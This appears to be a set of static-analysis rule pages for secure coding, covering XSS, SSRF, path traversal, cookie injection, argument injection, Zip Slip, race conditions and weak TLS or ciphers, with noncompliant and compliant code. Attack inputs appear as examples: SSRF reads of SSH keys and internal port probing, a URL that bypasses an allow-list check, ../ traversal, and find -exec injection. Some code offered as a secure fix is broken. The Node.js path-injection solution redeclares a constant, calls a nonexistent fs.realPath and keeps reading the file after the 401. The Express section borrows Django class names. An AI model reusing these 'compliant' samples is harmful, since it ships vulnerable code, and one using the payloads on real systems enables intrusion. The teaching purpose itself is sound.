The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Express.js

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains unsanitized user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, you can use the JsonResponse class to safely return JSON messages.

Noncompliant code example

function (req, res) {
    json = JSON.stringify({ "data": req.query.input });
    res.send(json);
};

Compliant solution

function (req, res) {
    res.json({ "data": req.query.input });
};

It is also possible to set the content-type header manually using the content_type parameter when creating an HttpResponse object.

Noncompliant code example

function (req, res) {
    res.send(req.query.input);
};

Compliant solution

function (req, res) {
    res.set('Content-Type', 'text/plain');
    res.send(req.query.input);
};

How does this work?

In case the response consists of HTML code, it is highly recommended to use a template engine like ejs to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.

If you do not intend to send HTML code to clients, the vulnerability can be resolved by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the HTTP response is not vulnerable to reflected Cross-Site Scripting.

For example, setting the content-type header to text/plain allows to safely reflect user input since browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that there are more content-types than text/html that allow to execute JavaScript code in a browser and thus are prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

tssecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Node.js

Code examples

The following code is vulnerable to SSRF as it opens a URL defined by untrusted data.

Noncompliant code example

const axios = require('axios');
const express = require('express');

const app = express();

app.get('/example', async (req, res) => {
    try {
        await axios.get(req.query.url); // Noncompliant
        res.send("OK");
    } catch (err) {
        console.error(err);
        res.send("ERROR");
    }
})

Compliant solution

const axios = require('axios');
const express = require('express');

const schemesList = ["http:", "https:"];
const domainsList = ["trusted1.example.com", "trusted2.example.com"];

app.get('/example', async (req, res) => {
    const url = (new URL(req.query.url));

    if (schemesList.includes(url.protocol) && domainsList.includes(url.hostname)) {
        try {
            await axios.get(url);
            res.send("OK");
        } catch (err) {
            console.error(err);
            res.send("ERROR");
        }
    }else {
        res.send("INVALID_URL");
    }
})

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.

Resources

Standards

tssecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Node.js

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to read arbitrary files.

Noncompliant code example

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' }); // Noncompliant
}

Compliant solution

const path = require('path');
const fs   = require('fs');

function (req, res) {
  const targetDirectory = "/data/app/resources/";
  const userFilename = path.join(targetDirectory, req.query.filename);
  const userFilename = fs.realPath(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    res.status(401).send();
  }

  let data = fs.readFileSync(userFilename, { encoding: 'utf8', flag: 'r' });
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like `fs.realPath`. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

const path = require('path');

function (req, res) {
  const targetDirectory = "/data/app/resources"
  const userFilename = path.join(targetDirectory, req.query.filename));
  const userFilename = fs.realPath(userFilename);

  if (!userFilename.startsWith(targetDirectory)) {
    res.status(401).send();
  }

  let data = fs.readFileSync(userFilename);
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Do not use path.resolve as a validator

The official documentation states that if any argument other than the first is an absolute path, any previous argument is discarded.

This means that including untrusted data in any of the parameters and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

tssecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Express.js

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        const cookie = req.query.cookie;
        res.cookie("connect.sid", cookie); // Noncompliant
    }

    return res.redirect("/welcome");
});

Compliant solution

import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

app.get("/checkcookie", (req, res) => {
    if (req.cookies["connect.sid"] === undefined) {
        return res.redirect("/getcookie");
    }

    return res.redirect("/welcome");
});

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

tssecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

const { spawn } = require("child_process");
const input = req.query.input;
const proc = spawn("/usr/bin/find", [input]); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

const { spawn } = require("child_process");
const input = req.query.input;
if (allowed.includes(input)) {
  const proc = spawn("/usr/bin/find", [input]);
}

See

tssecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip and an attacker is able to exploit it by submitting an archive he controls.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Node.js

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

const AdmZip = require("adm-zip");
const upload = require('multer');

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        var writer = fs.createWriteStream(zipEntry.entryName); // Noncompliant
        writer.write(zipEntry.getData().toString("utf8"));
    });
});

Compliant solution

const AdmZip = require("adm-zip");
const upload = require('multer');

const unzipTargetDir = "/example/directory/";

app.get('/example', upload.single('file'), (req, res) => {
    const zip = new AdmZip(req.file.buffer);
    const zipEntries = zip.getEntries();

    zipEntries.forEach(function (zipEntry) {
        const canonicalPath = path.normalize(unzipTargetDir + zipEntry.entryName);
        if (canonicalPath.startsWith(unzipTargetDir)) {
            let writer = fs.createWriteStream(canonicalPath);
            writer.write(zipEntry.getData().toString("utf8"));
        }
    });
});

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follow:

  1. Resolve the canonical path of the file by using methods like path.join or path.normalize. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string variable targetDirectory does not end with a path separator:

const AdmZip = require("adm-zip");

const targetDirectory = "/Users/John";

app.get('/example', (req, res) => {
    const canonicalPath = path.normalize(targetDirectory + req.query.filename)

    if (canonicalPath.startsWith(targetDirectory)) {
        const zip = new AdmZip(canonicalPath);
	    const zipEntries = zip.getEntries();

    	zipEntries.forEach(function (zipEntry) {
            var writer = fs.createWriteStream(zipEntry.entryName);
            writer.write(zipEntry.getData().toString("utf8"));
	    });
    }
});

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

cpp:S5982

The purpose of changing the current working directory is to modify the base path when the process performs relative path resolutions. When the working directory cannot be changed, the process keeps the directory previously defined as the active working directory. Thus, verifying the success of chdir() type of functions is important to prevent unintended relative paths and unauthorized access.

Ask Yourself Whether

  • The success of changing the working directory is relevant for the application.
  • Changing the working directory is required by chroot to make the new root effective.
  • Subsequent disk operations are using relative paths.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

After changing the current working directory verify the success of the operation and handle errors.

Sensitive Code Example

The chdir operation could fail and the process still has access to unauthorized resources. The return code should be verified:

const char* any_dir = "/any/";
chdir(any_dir); // Sensitive: missing check of the return value

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
fchdir(fd); // Sensitive: missing check of the return value

Compliant Solution

Verify the return code of chdir and handle errors:

const char* root_dir = "/jail/";
if (chdir(root_dir) == -1) {
  exit(-1);
} // Compliant

int fd = open(any_dir, O_RDONLY | O_DIRECTORY);
if(fchdir(fd) == -1) {
  exit(-1);
} // Compliant

See

cpp:S5832

Why is this an issue?

Pluggable authentication module (PAM) is a mechanism used on many unix variants to provide a unified way to authenticate users, independently of the underlying authentication scheme.

When authenticating users, it is strongly recommended to check the validity of the account (not locked, not expired …​), otherwise it leads to unauthorized access to resources.

Noncompliant code example

The account validity is not checked with pam_acct_mgmt when authenticating a user with pam_authenticate:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) { // Noncompliant - missing pam_acct_mgmt
        return -1;
    }

    return 0;
}

The return value of pam_acct_mgmt is not checked:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    pam_acct_mgmt(pamh, 0); // Noncompliant
    return 0;
}

Compliant solution

When authenticating a user with pam_authenticate, check the account validity with pam_acct_mgmt:

int valid(pam_handle_t *pamh) {
    if (pam_authenticate(pamh, PAM_DISALLOW_NULL_AUTHTOK) != PAM_SUCCESS) {
        return -1;
    }
    if (pam_acct_mgmt(pamh, 0) != PAM_SUCCESS) { // Compliant
        return -1;
    }
    return 0;
}

Resources

cpp:S5847

Why is this an issue?

"Time Of Check to Time Of Use" (TOCTOU) vulnerabilities occur when an application:

  • First, checks permissions or attributes of a file: for instance, is a file a symbolic link?
  • Next, performs some operations such as writing data to this file.

The application cannot assume the state of the file is unchanged between these two steps, there is a race condition (ie: two different processes can access and modify the same shared object/file at the same time, which can lead to privilege escalation, denial of service and other unexpected results).

For instance, attackers can benefit from this situation by creating a symbolic link to a sensitive file directly after the first step (eg in Unix: /etc/passwd) and try to elevate their privileges (eg: if the written data has the correct /etc/passwd file format).

To avoid TOCTOU vulnerabilities, one possible solution is to do a single atomic operation for the "check" and "use" actions, therefore removing the race condition window. Another possibility is to use file descriptors. This way the binding of the file descriptor to the file cannot be changed by a concurrent process.

Noncompliant code example

A "check function" (for instance access, stat …​ in this case access to verify the existence of a file) is used, followed by a "use function" (open, fopen …​) to write data inside a non existing file. These two consecutive calls create a TOCTOU race condition:

#include <stdio.h>

void fopen_with_toctou(const char *file) {
  if (access(file, F_OK) == -1 && errno == ENOENT) {
    // the file doesn't exist
    // it is now created in order to write some data inside
    FILE *f = fopen(file, "w"); // Noncompliant: a race condition window exist from access() call to fopen() call calls
    if (NULL == f) {
      /* Handle error */
    }

    if (fclose(f) == EOF) {
      /* Handle error */
    }
  }
}

Compliant solution

If the file already exists on the disk, fopen with x mode will fail:

#include <stdio.h>

void open_without_toctou(const char *file) {
  FILE *f = fopen(file, "wx"); // Compliant
  if (NULL == f) {
    /* Handle error */
  }
  /* Write to file */
  if (fclose(f) == EOF) {
    /* Handle error */
  }
}

A more generic solution is to use "file descriptors":

void open_without_toctou(const char *file) {
  int fd = open(file, O_CREAT | O_EXCL | O_WRONLY);
  if (-1 != fd) {
    FILE *f = fdopen(fd, "w");  // Compliant
  }
}

Resources

cpp:S5849

Setting capabilities can lead to privilege escalation.

Linux capabilities allow you to assign narrow slices of root's permissions to files or processes. A thread with capabilities bypasses the normal kernel security checks to execute high-privilege actions such as mounting a device to a directory, without requiring (additional) root privileges.

Ask Yourself Whether

Capabilities are granted:

  • To a process that does not require all capabilities to do its job.
  • To a not trusted process.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Capabilities are high privileges, traditionally associated with superuser (root), thus make sure that the most restrictive and necessary capabilities are assigned to files and processes.

Sensitive Code Example

When setting capabilities:

cap_t caps = cap_init();
cap_value_t cap_list[2];
cap_list[0] = CAP_FOWNER;
cap_list[1] = CAP_CHOWN;
cap_set_flag(caps, CAP_PERMITTED, 2, cap_list, CAP_SET);

cap_set_file("file", caps); // Sensitive
cap_set_fd(fd, caps); // Sensitive
cap_set_proc(caps); // Sensitive
capsetp(pid, caps); // Sensitive
capset(hdrp, datap); // Sensitive: is discouraged to be used because it is a system call

When setting SUID/SGID attributes:

chmod("file", S_ISUID|S_ISGID); // Sensitive
fchmod(fd, S_ISUID|S_ISGID); // Sensitive

See

cpp:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("DES/CBC/PKCS7", Botan::ENCRYPTION); // Noncompliant
}

Compliant solution

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Documentation

Standards

cpp:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Botan

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/ECB", Botan::ENCRYPTION); // Noncompliant
}

Example with an asymmetric cipher, RSA:

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "PKCS1v15"); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

#include <botan/cipher_mode.h>

void encrypt() {
  Botan::Cipher_Mode::create("AES-256/GCM", Botan::ENCRYPTION);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

#include <botan/rng.h>
#include <botan/auto_rng.h>
#include <botan/rsa.h>
#include <botan/pubkey.h>

void encrypt() {
  std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::AutoSeeded_RNG);
  Botan::RSA_PrivateKey                           rsaKey(*rng.get(), 2048);

  Botan::PK_Encryptor_EME(rsaKey, *rng.get(), "OAEP");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

cpp:S5782

Why is this an issue?

Array overruns and buffer overflows happen when memory access accidentally goes beyond the boundary of the allocated array or buffer. These overreaching accesses cause some of the most damaging, and hard to track defects.

When the buffer overflow happens while reading a buffer, it can expose sensitive data that happens to be located next to the buffer in memory. When it happens while writing a buffer, it can be used to inject code or to wipe out sensitive memory.

This rule detects when a POSIX function takes one argument that is a buffer and another one that represents the size of the buffer, but the two arguments do not match.

Noncompliant code example

char array[10];
initialize(array);
void *pos = memchr(array, '@', 42); // Noncompliant, buffer overflow that could expose sensitive data

Compliant solution

char array[10];
initialize(array);
void *pos = memchr(array, '@', 10);

Exceptions

Functions related to sockets using the type socklen_t are not checked. This is because these functions are using a C-style polymorphic pattern using union. It relies on a mismatch between allocated memory and sizes of structures and it creates false positives.

Resources

cpp:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in cURL

Code examples

The following code samples attempt to create an HTTP request.

Noncompliant code example

This sample uses Curl’s default TLS algorithms, which are weak cryptographical algorithms: TLSv1.0 and LTSv1.1.

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();                                      // Noncompliant
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");

    curl_easy_perform(curl);
}

Compliant solution

#include <curl/curl.h>

void encrypt() {
    CURL *curl;
    curl_global_init(CURL_GLOBAL_DEFAULT);

    curl = curl_easy_init();
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    curl_easy_setopt(curl, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2);

    curl_easy_perform(curl);
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

cpp:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
